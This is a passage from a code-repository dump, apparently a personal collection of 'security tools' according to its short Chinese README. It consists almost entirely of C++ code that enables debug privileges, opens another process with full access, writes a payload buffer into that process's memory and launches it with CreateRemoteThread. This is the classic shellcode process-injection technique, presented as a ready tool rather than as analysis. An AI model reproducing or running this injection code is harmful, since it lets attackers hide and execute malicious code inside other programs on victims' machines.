| TOKEN_QUERY, &CurrentToken)) { 24 | cout << "We Need Administrator Priveileges!" << endl; 25 | return 0; 26 | } 27 | 28 | if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &SeDebugNameValue)) { 29 | CloseHandle(CurrentToken); 30 | cout << "We Need Administrator Priveileges!" << endl; 31 | return 0; 32 | } 33 | 34 | TokenProvoleges.PrivilegeCount = 1; 35 | TokenProvoleges.Privileges[0].Luid = SeDebugNameValue; 36 | TokenProvoleges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 37 | 38 | if (!AdjustTokenPrivileges(CurrentToken, FALSE, &TokenProvoleges, sizeof TokenProvoleges, NULL, NULL)) { 39 | CloseHandle(CurrentToken); 40 | cout << "We Need Administrator Priveileges!" << endl; 41 | return 0; 42 | } 43 | 44 | CloseHandle(CurrentToken); 45 | 46 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessID); 47 | if (hProcess == 0) { 48 | cout << "[-] Open Process Failed! Got System Error Code: " << GetLastError() << endl; 49 | CloseHandle(hProcess); 50 | return 0; 51 | } 52 | DWORD Size = sizeof(buf); 53 | LPVOID RemoteBuffer = VirtualAllocEx(hProcess, NULL, Size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE); 54 | if (RemoteBuffer == NULL) { 55 | cout << "[-] Memory Alloc Failed! Got System Error Code: " << GetLastError() << endl; 56 | CloseHandle(hProcess); 57 | return 0; 58 | } 59 | ; 60 | if (!WriteProcessMemory(hProcess, RemoteBuffer, buf, Size, NULL)) { 61 | cout << "[-] Write Process Memory Failed! Got System Error Code: " << GetLastError() << endl; 62 | CloseHandle(hProcess); 63 | return 0; 64 | } 65 | HANDLE RemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)RemoteBuffer, NULL, 0, NULL); 66 | if (RemoteThread == NULL) { 67 | cout << "[-] Create Remote Thread Failed! Got System Error Code: " << GetLastError() << endl; 68 | CloseHandle(hProcess); 69 | return 0; 70 | } 71 | cout << "[+] Process Injection Succeed!" << endl; 72 | CloseHandle(hProcess); 73 | return 0; 74 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 安全工具 2 | 日常积累的小工具 3 | --------------------------------------------------------------------------------